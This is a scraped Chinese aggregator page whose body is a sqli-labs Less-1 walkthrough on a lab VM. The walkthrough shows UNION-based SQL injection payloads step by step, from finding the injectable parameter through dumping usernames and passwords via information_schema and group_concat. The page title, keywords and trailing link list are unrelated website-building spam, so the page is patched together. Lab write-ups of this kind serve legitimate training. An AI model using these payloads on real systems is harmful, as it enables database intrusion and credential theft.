当前位置: 首页 > news >正文

wap网站开发需要多少钱网站建设程序开发

news 2025/11/14 18:28:35
wap网站开发需要多少钱,网站建设程序开发,wordpress htaccess 下载,文学网站建设1.1 靶场环境 系统centos7 IP地址192.168.1.24 1.2 联合注入原理 联合查询注入是联合两个表进行注入攻击#xff0c;使用关键词 union select 对两个表进行联合查询。两个表的字段要数要相同#xff0c;不然会出现报错。 1.3 找注入点 找注入点#xff0c;当输入id1 an…1.1 靶场环境 系统centos7 IP地址192.168.1.24 1.2 联合注入原理 联合查询注入是联合两个表进行注入攻击使用关键词 union select 对两个表进行联合查询。两个表的字段要数要相同不然会出现报错。 1.3 找注入点 找注入点当输入id1 and 12时没有变化尝试单引号闭合找到注入类型 字符型注入单引号闭合 1.4 判断字段数 使用order by 爆破字段数 http://192.168.1.24/sqli-labs/Less-1/?id-1 order by 3-- 没有报错 http://192.168.1.24/sqli-labs/Less-1/?id-1 order by 4-- 报错 字段数为4 1.5 找回显点 http://192.168.1.24/sqli-labs/Less-1/?id-1 union select 1,2,3,4-- 爆出回显点23 1.6 爆数据库与数据库版本信息 开始信息收集(注意union前后格式要相同) ?id-1 union select 1,database(),version()-- database():当前数据库名 version():数据库版本 user():数据库用户用于判断是否有最高权限 爆数据库名以及数据库版本 1.7 爆数据表 爆破表名 ?id-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schemadatabase()-- 得到emails,referers,uagents,users数据表 1.8 爆users表中字段名 ?id-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_nameusers-- 得到这些字段名user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password 1.9 爆用户名及密码 爆破字段内容 ?id-1 union select 1,2,(select group_concat(username,password)from users)-- 在 sql 注入时加入换行符 我们可以在每一个用户名密码后面添加一个换行符。 HTML 中换行符用来表示但是我们需要转换成十六进制 0x3C,0x68,0x72,0x2F,0x3E ASCII 码表ASCII_百度百科 将十六进制的换行符添加到 password 字段后注password 后面必须添加一个逗号 http://192.168.1.24/sqli-labs/Less-1/?id-1 union select 1,group_concat(username,0x3a,password,0x3C,0x68,0x72,0x2F,0x3E),3 from users-- 可以看到每一行都是一个用户名密码
http://www.zqtcl.cn/news/444081/

相关文章:

  • 大家都在哪些网站上做医药招商wordpress po文件
  • 国外主题网站兰州app
  • 建设项目自主验收公示网站dedecms英文外贸网站企业模板下载
  • 做网站要服务器吗前端企业网站开发
  • 用html写一个个人介绍多网站怎么做seo
  • 做网站打广告犯法吗中国建设投资集团 网站首页
  • 怎么免费申请个人网站职业技能培训有哪些
  • 小型的企业网站湖南备案网站建设方案书
  • 现在做网站公司seo怎么做教程
  • asp化妆品网站windows优化大师有必要安装吗
  • 网站流量分析系统制作图片网站
  • 做网站技术路线广州番禺发布公众号
  • 企业网站自己可以做吗服装网站建设的利益分析
  • 网站做软件居众装饰集团有限公司
  • 南山网站制作联系电话芒果国际影城星沙店
  • 珠海网站设计费用建企业版网站多久
  • linux 网站搬家wordpress 卸载plugin
  • 江苏省建设厅网站 投诉编辑网站的软件手机
  • 深圳地图各区分布图seo网络优化师就业前景
  • 北京网站备案代理国家企业信用信息公示系统广东
  • 推销网站重庆网站优化公司哪家便宜
  • 外贸公司网站搭建礼品网站建设
  • 网站建设 今晟网络中国制造网官网登录
  • 东莞网站设计如何常州做网站设计
  • php网站数据库修改网站备案有必要吗
  • 电商会学着做网站呢WordPress又拍云cdn
  • 网站健设推广产品多少钱网站规划有什么意义
  • 诚信网站备案中心内江网站建设新闻
  • 品牌形象网站有哪些百度应用中心
  • 网站建设找什么工作室甜点网站建设的功能及意义